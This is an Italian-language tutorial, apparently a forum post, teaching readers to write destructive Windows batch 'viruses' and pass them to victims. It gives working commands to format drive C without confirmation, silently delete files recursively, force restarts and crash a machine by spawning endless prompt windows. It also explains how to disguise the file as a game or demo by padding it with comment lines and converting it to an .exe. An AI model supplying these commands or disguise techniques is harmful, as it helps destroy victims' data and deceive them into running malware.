Guida alla programmazione dei virus in batch

 

Eccocci qua! Allora, con questa breve guida vi spiegherò come creare virus
in batch, cercherò di essere il più breve possibile...

- CAPITOLO 1 - Salvare i file con estensione .bat -

- Aprite il blocco note
- Scrivete il codice del virus
- Andate su salva e come formato scegliete "tutti i file"
- Nominate il file come volete, ma ricordatevi di scrivere l'estensione
quindi dovrete scrivere una cosa del genere "bellapevoi.bat" o anche
"virus.bat"
A questo punto l'icona del programma che avete creato dovrebbe essere uno schermo
con una rotella in mezzo...


- CAPITOLO 2 - Formattare -

Adesso passiamo alla pratica vera e propria:
aprite il file blocco note e incollate questa stringa...


format C: /autotest /q /u


Ecco qua, questo virus formatta l'unità C...
in questo modo il computer si formatterà senza chiedere all'utente
di inserire un nuovo disco ne se si vuole confermare la
formattazzione, e non si potrà neanche bloccare in un secondo momento .
A questo punto salvate in .bat e non testatelo su voi stessi.



- CAPITOLO 3 - Cancellare i file -

Ok, passiamo adesso a un'altro comando altamente distruttivo, ossia quello
di cancellare i file...

@ERASE /S /Q "C:\xxx\xxx\*.*"
@DEL /S /Q "C:\xxx\xxx\*.*"

i due comandi svolgono lo STESSO identico compito.

Ma analizziamo un po' meglio il codice...

la "@" non visualizza il percorso del file, ossia non dice in quale cartella è presente quest'ultimo
ERASE e DEL sono i comandi che cancellano i file, mentre quelli
seguiti da "/" sono gli attributi dei comandi... Ecco un'elenco degli attributi
di questi due comandi

/P Chiede conferma prima di eliminare ogni file.
/F Forza l'eliminazione dei file di sola lettura.
/S Elimina i file specificati da tutte le sottodirectory.

/Q Modalità silenziosa, non chiede conferma per eliminazioni globali.
/A Seleziona i file da eliminare in base agli attributi.


Adesso passiamo all'ultima parte del codice ossia "C:\xxx\xxx\*.*" è intuibile
che io stia parlando del percorso di una cartella, ma cos'è quell' *.*
alla fine del codice? *.* vuol dire tutti quanti i file, ossia
"tutti i file di tutti i formati", se volessi cancellare solo i file in dll scriverei
"*.dll" e se volessi cancellare tutti i file che hanno un determinato nome ma
hanno un'estensione diversa scriverei "bellapete.*"


Bene, adesso un'ultimo appunto prima di concludere questo capitolo, se dobbiamo cancellare
un singolo file possiamo semplicemente usare il comando senza attributi, se si tratta di un singolo file
il programma non chiederà neanche la conferma se cancellarlo o meno...


- CAPITOLO 4 - Shutdown -

Allora, il comando shutdown è quello che permette di spegnere il computer, di se per se non è che faccia
poi molto, ma può rilevarsi un comando davvero bastardo...

shutdown -f -t 1000 -r

Ecco fatto, credo che vi basti guardare la lista dei comandi qui sotto per capire che cosa
farebbe questo programma, in ogni caso vi spiegherò il comando -t xx che può apparire più complesso...
Questo comando permette di spegnere (riavviare come in questo caso o effettuare il logoff) il computer
dopo un tot di tempo in secondi a scelta dall'utente...


-i : attiva l’interfaccia utente grafica
-l : effettua il logoff dell’utente.
-r : riavvia il sistema
-s : chiude la sessione di Windows (spegne il computer)
-t : xx indica i secondi di attesa prima della chiusura di Windows
-f : chiude le applicazioni ancora aperte




- CAPITOLO 5 - Impallare il Pc -

Con questo piccolo capitolo vi spiegherò come impallare un computer senza creare danni di altro tipo...
Aprite il fido blocco note e scrivete un'infinità di volte (uno sotto l'altro) il seguente comando:


START
START
START
START
START
START
...
...
...


Cosa fa questo programma? Apre per ogni start una nuova finestra del prompt, in questo modo a una certa il
computer della vittimà si impallerà e toccherà staccare la spina...



- CAPITOLO 6 - Appesantire i vostri virus -

Mentre passiamo il nostro virus a qualcuno, spacciandolo per la demo di "pro6", qualche gioco o robe varie,
chiunque abbia un po' di conoscenza generale sui computer si accorgerebbe che un virus non può pesare solo
1 o 2 kb... Fortunatamente esiste questa stringa:


@REM xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


La stringa REM è una stringa per creare commenti, non ha alcuna funzione nello svolgimento
del programma e per questo può essere usato per appesantire i file...
Basta copiarla un bel po' di volte sul blocco note e la pesantezza del file aumenterà notevolmente...
Non occorre che scriviate per forza "xxxx" potete scrivere qualsiasi cosa, l'importante e che sia ripetuto
tante volte...


- CAPITOLO 7 - Convertire i file da .bat a .exe -

Diciamo che se passate un file in .bat praticamente chiunque con un po' di cervello guarderebbe il sorgente
e capirebbe che si tratta di un virus, per questo è molto utile convertire il file i .exe.
Oltretutto la maggior parte dei setup di programmi sono in .exe quindi le probabilità che la vittima apra il
file aumentano notevolmente...
Il miglior programma fino ad ora è questo:



http://www.freewarefiles.com/program_9_223_21480.html


Dopo aver scelto la lingua apritelo e troverete diverse opzioni: una per cambiare l'icona, una per
aggiungere altri file al .bat ecc...



- CONCLUSIONE -

Fine!!!! Spero di essere stato abbastanza chiaro, per chiarimenti,
domande e consigli contattatemi in PV...
Bye, Bye
Alexander!